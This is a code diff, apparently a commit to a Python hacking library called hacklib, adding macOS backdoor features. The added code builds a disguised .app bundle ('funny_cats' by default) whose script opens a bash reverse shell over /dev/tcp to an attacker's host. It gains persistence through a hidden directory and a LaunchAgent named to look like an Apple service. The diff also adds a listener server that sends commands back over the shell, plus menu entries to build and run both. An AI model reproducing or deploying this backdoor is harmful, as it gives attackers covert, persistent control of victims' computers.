OSX backdooring

Author: lazorfuzz

hacklib.py

@@ -21,6 +21,85 @@
 import socket, httplib, threading, time, urllib2, os
 from Queue import Queue
 
+class Backdoor(object):
+    '''Creates a persistent backdoor payload. Currently only for Mac OSX.
+        Payloads for Windows and Linux coming soon.'''
+
+    def __init__(self):
+        self.IP = ''
+        self.port = ''
+        self.osx_payload = '''#!/bin/bash
+mkdir ~/Library/.h
+echo '#!/bin/bash
+bash -i >& /dev/tcp/HOST/PORT 0>&1
+wait' > ~/Library/.h/connect.sh
+chmod +x ~/Library/.h/connect.sh
+echo '<plist version="1.0">
+<dict>
+<key>Label</key>
+<string>com.apples.services</string>
+<key>ProgramArguments</key>
+<array>
+<string>/bin/sh</string>
+<string>'$HOME'/Library/.h/connect.sh</string>
+</array>
+<key>RunAtLoad</key>
+<true/>
+<key>StartInterval</key>
+<integer>60</integer>
+<key>AbandonProcessGroup</key>
+<true/>
+</dict>
+</plist>' > ~/Library/LaunchAgents/com.apples.services.plist
+chmod 600 ~/Library/LaunchAgents/com.apples.services.plist
+launchctl load ~/Library/LaunchAgents/com.apples.services.plist
+exit
+'''
+
+    def create(self, IP, port, OS, appname = 'funny_cats'):
+        '''Creates a user-level reverse shell.'''
+        
+        if OS == 'OSX':
+            self.osx_payload = self.osx_payload.replace('HOST', IP).replace('PORT', str(port))
+            try:
+                os.makedirs(os.getcwd() + '/' + appname + '.app/Contents/MacOS')
+            except: pass
+            payload_path = os.getcwd() + '/' + appname + '.app/Contents/MacOS/' + appname
+            with open(payload_path, 'w') as f:
+                f.write(self.osx_payload)
+            import subprocess
+            subprocess.Popen(['chmod', '755', payload_path])
+            print 'Payload saved to ' + os.getcwd() + appname + '.app'
+
+class Server(object):
+
+    def __init__(self, port):
+        import socket
+        self.port = port
+        self.address = ('localhost', port)
+
+    def listen(self):
+        import time
+        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        sock.bind(self.address)
+        sock.listen(1)
+        while True:
+            connection, cAddress = sock.accept()
+            try:
+                print 'New connection', cAddress
+                connection.sendall('whoami\n')
+                while True:
+                    data = connection.recv(32768)
+                    if data:
+                        print '\n'.join(data.split('\n')[:-1])
+                        response = raw_input(data.split('\n')[-1])
+                        data = None
+                    if response:
+                        connection.sendall(response + '\n')
+                        time.sleep(0.5)
+            finally:
+                connection.close()
+                
 class FTPAuth(object):
     '''FTP login and command handler.
     Commands:
@@ -644,6 +723,27 @@ def uiLanScan():
         print ip
     print 'Lan scan complete.'
     time.sleep(2)
+
+def uiCreateBackdoor():
+    print ''
+    print 'Select OS'
+    print '1) Mac OSX'
+    ink = _Getch()
+    cmd = ink()
+    if cmd == '1':
+        ip = raw_input('Listener IP > ')
+        port = raw_input('Listener Port > ')
+        appname = raw_input('Filename > ')
+        bd = Backdoor()
+        bd.create(ip, port, 'OSX', appname)
+        time.sleep(2)
+
+def uiServer():
+    print ''
+    port = raw_input('Listening port > ')
+    s = Server(int(port))
+    print 'Listening on port ' + port
+    s.listen()
 
 def userInterface():
     '''Start UI if hacklib isn't being used as a library.
@@ -660,10 +760,12 @@ def userInterface():
         print '1) Connect to a proxy'
         print '2) Target an IP or URL'
         print '3) Lan Scan'
-        print '4) Exit'
+        print '4) Create Backdoor'
+        print '5) Server'
+        print '6) Exit'
         ink = _Getch()
         cmd = ink()
-        if cmd == '4':
+        if cmd == '6':
             return
         if cmd == '2':
             address = raw_input('Input IP or URL > ')
@@ -686,6 +788,12 @@ def userInterface():
 
         if cmd == '3':
             uiLanScan()
+
+        if cmd == '4':
+            uiCreateBackdoor()
+
+        if cmd == '5':
+            uiServer()
 
         if cmd == '1':
             print 'Would you like to automatically find a proxy or input one manually?'